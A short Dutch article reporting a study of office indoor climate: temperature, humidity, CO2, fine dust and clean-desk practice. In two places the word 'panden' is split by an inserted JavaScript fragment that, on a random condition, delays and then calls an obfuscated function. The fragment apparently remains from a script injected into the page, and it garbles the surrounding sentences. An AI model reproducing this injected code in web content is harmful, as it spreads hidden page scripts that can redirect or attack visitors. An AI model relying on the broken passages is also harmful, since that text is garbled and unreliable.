Onderzoek binnenklimaat werkplekken

Na twee jaar onderzoek naar het binnenklimaat van werkplekken in een groot aantal kantoorpandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden is gebleken dat nog steeds bijna een kwart (23 procent) van de onderzochte pandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden onder de maat scoort als naar de gezondheid van de werkplek wordt gekeken.

Onderdelen

Het onderzoek richtte zich op de volgende onderdelen: een visuele inspectie (ventilatiemogelijkheden, staat van onderhoud en clean desk policy), de bepaling van de temperatuur, de relatieve luchtvochtigheid, de CO2-concentratie en de bepaling van de fijnstofconcentratie (PM 2,5) over een periode van enkel uren en de bepaling van de microbiologische kwaliteit. Opvallend was dat de clean desk veel beter scoorde. Bij een matige clean desk liggen op de bureaus redelijk veel tot veel losse spullen. En dat kan een mogelijke bron zijn van verontreiniging met micro-organismen en dat kan bovendien de schoonmaak bemoeilijken.

Meest in het oog

Van die overige onderzochte onderdelen, valt de gemeten temperatuur in het merendeel van de werkplekken binnen de norm van 20 tot 24 graden Celsius. Zorgelijker is dat op 88 procent van de onderzochte werkplekken, de luchtvochtigheid beduidend onder de norm van 40 à 50 procent ligt. “Kijken we naar de directe gezondheidsrisico’s dan springt het gemeten CO2 gehalte op de werkplekken het meest in het oog”.

Goede discipline

Conclusie: “Een goede discipline op de werkplek vertaalt zich naar minder stof en microbiologische vervuiling op en rond de werkplek. En verder is met name de relatieve luchtvochtigheid een grote zorg. De te lage luchtvochtigheid resulteert in overlast en irritaties en verhoogt de vatbaarheid voor virussen.”